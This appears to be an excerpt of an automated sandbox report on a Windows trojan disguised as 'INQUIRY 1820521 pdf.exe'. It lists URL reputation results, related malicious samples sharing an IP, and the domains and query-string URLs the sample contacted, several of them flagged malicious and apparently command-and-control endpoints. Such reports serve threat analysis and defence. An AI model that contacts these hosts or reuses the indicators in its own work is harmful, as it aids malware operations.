          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.carterandcone.com? | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cnl | 0% | URL Reputation | safe
          http://www.founder.com.cn/cnl | 0% | URL Reputation | safe
          http://www.founder.com.cn/cnl | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn0A | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.founder.com.cn/cna | 0% | URL Reputation | safe
          http://www.founder.com.cn/cna | 0% | URL Reputation | safe
          http://www.founder.com.cn/cna | 0% | URL Reputation | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.carterandcone.com11 | 0% | Avira URL Cloud | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.goodfont.co.krs-cz | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr? | 0% | Avira URL Cloud | safe
          http://www.tiro.comTZ0%Avira URL Cloudsafe
          http://www.carterandcone.come70%Avira URL Cloudsafe
          www.auggiepaws.com/gnk/0%Avira URL Cloudsafe
          http://www.tiro.coms0%Avira URL Cloudsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.carterandcone.coms-c0%Avira URL Cloudsafe
          http://www.founder.com.c0%URL Reputationsafe
          http://www.founder.com.c0%URL Reputationsafe
          http://www.founder.com.c0%URL Reputationsafe
          http://www.founder.com.cn/cnCg0%Avira URL Cloudsafe
          http://en.wikip0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          http://www.founder.com.c~0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.sandoll.co.krim0%Avira URL Cloudsafe
          http://www.xinghai-nb.com/gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM00%Avira URL Cloudsafe
          http://www.founder.com.cn/cnu-e0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.xinghai-nb.com | 104.21.82.58 | true | true | - | unknown
hhcuerkn.com | 210.152.87.233 | true | true | - | unknown
ext-sq.squarespace.com | 198.185.159.144 | true | false | - | high
www.hhcuerkn.com | unknown | unknown | true | - | unknown
www.mobcitylabs.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT | true | Avira URL Cloud: safe | unknown
http://www.hhcuerkn.com/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 | true | Avira URL Cloud: safe | unknown
www.auggiepaws.com/gnk/ | true | Avira URL Cloud: safe | low
http://www.xinghai-nb.com/gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cnP | INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr-e | INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.carterandcone.comTCV | INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sogou.com/web?query=%22xinghai-nb.com%22&ie=utf8 | ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4 | INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%22xinghai-nb.com%22 | ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp | false | - | high
http://weather.gc.ca/astro/seeing_e.html) | INQUIRY 1820521 pdf.exe | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.monotype.5;M | INQUIRY 1820521 pdf.exe, 00000000.00000003.651699352.0000000008690000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cnD | INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com? | INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cnl | INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn0A | INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cna | INQUIRY 1820521 pdf.exe, 00000000.00000003.647266371.000000000868A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.%s.comPA | explorer.exe, 0000000A.00000002.909308759.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com11 | INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html? | INQUIRY 1820521 pdf.exe, 00000000.00000003.651191297.000000000868E000.00000004.00000001.sdmp | false | - | high
http://www.goodfont.co.krs-cz | INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.kr? | INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.tiro.comTZ | INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.come7 | INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.coms | INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.comTC | INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coms-c | INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.c | INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnCg | INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://en.wikip | INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.c~ | INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.carterandcone.coml | INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn | INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sandoll.co.krim | INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cnu-e | INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.82.58 | www.xinghai-nb.com | United States | 13335 | CLOUDFLARENETUS | true
198.185.159.144 | ext-sq.squarespace.com | United States | 53831 | SQUARESPACEUS | false
210.152.87.233 | hhcuerkn.com | Japan | 4694 | IDCFIDCFrontierIncJP | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385289
Start date: 12.04.2021
Start time: 09:41:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 23s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: INQUIRY 1820521 pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@17/4@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 9.2% (good quality ratio 6.8%)
• Quality average: 57.3%
• Quality standard deviation: 39.3%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 108
• Number of non-executed functions: 162
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 92.122.145.220, 104.42.151.234, 20.82.210.154, 13.64.90.137, 205.185.216.42, 205.185.216.10, 104.43.193.48, 104.43.139.144, 92.122.213.247, 92.122.213.194, 52.255.188.83, 20.54.26.129
• Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
09:42:14 | API Interceptor | 1x Sleep call for process: INQUIRY 1820521 pdf.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                  198.185.159.144 | sgJRcWvnkP.exe | Get hash | malicious | Browse
                                                  • www.aldlan-studio.com/svh9/?EZA4iv=iUgadD8kb6gMm/UthcIeLrQXBXKqEwA1IwoQkb8SyhCa1CCH2tdbgVRBTGVl6GtCHz6WbdtHlg==&GzuLH=VBZtT83HH6GhB4
                                                  198.185.159.144 | remittance info.xlsx | Get hash | malicious | Browse
                                                  • www.makingwaves.design/svh9/?5ja0c8yp=HlxAPFB4jZ3NXox3gOhW2mb89mcrhBqsxr7jk8SFshbVhphDLQeHIc6bZtAlCAGtmfvtHQ==&2dn4M=z4DhUBy8
                                                  198.185.159.144 | 36ne6xnkop.exe | Get hash | malicious | Browse
                                                  • www.totally-seo.com/p2io/?1bVpY=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MoCWZBvIMUw&TVg8Ar=tFNd1Vlhj2qp
                                                  198.185.159.144 | mW07jhVxX5.exe | Get hash | malicious | Browse
                                                  • www.creationsbyjamie.com/nsag/?Jry=uVd8K&MHQD=ikjZmpp02NVieHaNLwg8/vzbnsAf6IhlNdOODdzSNMaisic822ysYeH69uqv2TJux/MF
                                                  198.185.159.144 | NEW ORDER ELO-05756485.exe | Get hash | malicious | Browse
                                                  • www.gammacake.com/riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls
                                                  198.185.159.144 | PO45937008ADENGY.exe | Get hash | malicious | Browse
                                                  • www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl
                                                  198.185.159.144 | LWlcpDjYIQ.exe | Get hash | malicious | Browse
                                                  • www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV
                                                  198.185.159.144 | RCS76393.exe | Get hash | malicious | Browse
                                                  • www.pimpmyrecipe.com/goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz
                                                  198.185.159.144 | PO4308.exe | Get hash | malicious | Browse
                                                  • www.alchemistslibrary.com/pnqr/?X2JtjTX8=z9nKZcvAPWzUQhY9y3T5XVIzOkQhxhUtd7CKHZyMoghVgOSKx+Fjs7sJEQh08Ts7gk8yJD62ag==&bl=TVItEdNXpFHh
                                                  198.185.159.144 | TazxfJHRhq.exe | Get hash | malicious | Browse
                                                  • www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu
                                                  198.185.159.144 | Order Inquiry.exe | Get hash | malicious | Browse
                                                  • www.getgenevieved.com/r4ei/?9rQl2=wFNtQXbP&t6Ad=lOfuxtPF4il1Jf5EERhirk3Wdt+b9SUzBWaFyElm1rRKZL2x7wuCbVuufCM8qdhuJ86n
                                                  198.185.159.144 | TACA20210407.PDF.exe | Get hash | malicious | Browse
                                                  • www.cindybelardo.com/qqeq/?oX=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr976CPGLkKL8&sBZ8qr=Fxl8FxGPjJo8-
                                                  198.185.159.144 | New Order.exe | Get hash | malicious | Browse
                                                  • www.radiorejekts.com/gwam/?Iry=ONtj9W7nV9ZGpEHVJNfDlWrNbkpYgiFClGnoUoEoQiKZyCXOLwMg6K6LKjWWFncBTlNA&ob30vr=S0Glx8
                                                  198.185.159.144 | SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe | Get hash | malicious | Browse
                                                  • www.cindybelardo.com/qqeq/?UR-TRLn=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr+bASemz+tq7&P6u=Hb9l0TTXQ4NLhX
                                                  198.185.159.144 | New PO#700-20-HDO410444RF217,pdf.exe | Get hash | malicious | Browse
                                                  • www.xomonroe.com/evh4/?vR-lx=mUKuFt7Jt/u71c4PSt38ziCZS3BUg2e8LD2S6eZiZC4IumnTujc05pOAm4tUdXdaGNCmokkeSA==&E8LHll=jfIX5LDxkxdhJTgP
                                                  198.185.159.144 | New Month.exe | Get hash | malicious | Browse
                                                  • www.ussouthernhome.com/nppk/?kfIXa4=PcNj3q/CMcdvPYJC9A1ueSg5wRTqWaK9K+KWTMGfE5xIowphBNT+eHYPWkjoOWig7+Qi&XP0=ybFLQT2H0FsXBx
                                                  198.185.159.144 | QUOTATION REQUEST.exe | Get hash | malicious | Browse
                                                  • www.markrobersticker.com/aun3/?YrIHdvPX=r/YBW9ssF3S+2poRG61gcf3j1YCgKIjwgQz6XW4ODbs5DL3PWKC9kUAY5ABsTG3sD74i&Dzut_N=3fm0
                                                  198.185.159.144 | new built.exe | Get hash | malicious | Browse
                                                  • www.amymako.com/klf/?TlX=YvLT&t8o=YIBPr2PP4TUydPzAxpqYzoT8Fd3d4uq1lz450j/EP32B3j2OHU2eBgUME3q0XrkiC9k9
                                                  198.185.159.144 | Invoice.xlsx | Get hash | malicious | Browse
                                                  • www.aratssycosmetics.com/iu4d/?L2JH=uKRUrjhLA6aGoerdjROgrXpkE9A34BbuVfDDyYeArPtVUwLJNjfP2xipo2Au/YQGKskRiw==&0n=fxlp
                                                  198.185.159.144 | MACHINE SPECIFICATION.exe | Get hash | malicious | Browse
                                                  • www.egofickle.com/rrrq/?0R-LTpD=fIBAwtBUc2AtuFdzEcCTdBR4iqwx1dALhor1r45uJJNE7oTAKP6XpVhMc7NBwxyLLq7z&uDKlwt=XPiPwvlxrzD

                                                  Domains

                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                  ext-sq.squarespace.com | RFQ #Uacac#Uc801#Uc694#Uccad_#Ud574#Uc131190918.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | 36ne6xnkop.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | mW07jhVxX5.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | cV1uaQeOGg.exe | Get hash | malicious | Browse
                                                  • 198.49.23.145
                                                  ext-sq.squarespace.com | PO.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | PO45937008ADENGY.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | LWlcpDjYIQ.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | TazxfJHRhq.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | Order Inquiry.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | TACA20210407.PDF.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | New Order.exe | Get hash | malicious | Browse
                                                  • 198.49.23.144
                                                  ext-sq.squarespace.com | New Order.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | DHL Shipping Documents.exe | Get hash | malicious | Browse
                                                  • 198.49.23.145
                                                  ext-sq.squarespace.com | New PO#700-20-HDO410444RF217,pdf.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | New Month.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | QUOTATION REQUEST.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | new built.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | Invoice.xlsx | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  ext-sq.squarespace.com | MACHINE SPECIFICATION.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144

                                                  ASN

                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                  SQUARESPACEUS | sgJRcWvnkP.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | remittance info.xlsx | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | 36ne6xnkop.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | mW07jhVxX5.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | NEW ORDER ELO-05756485.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | PO45937008ADENGY.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | LWlcpDjYIQ.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | RCS76393.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | PO4308.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | TazxfJHRhq.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | Order Inquiry.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | PO#41000055885.exe | Get hash | malicious | Browse
                                                  • 198.49.23.144
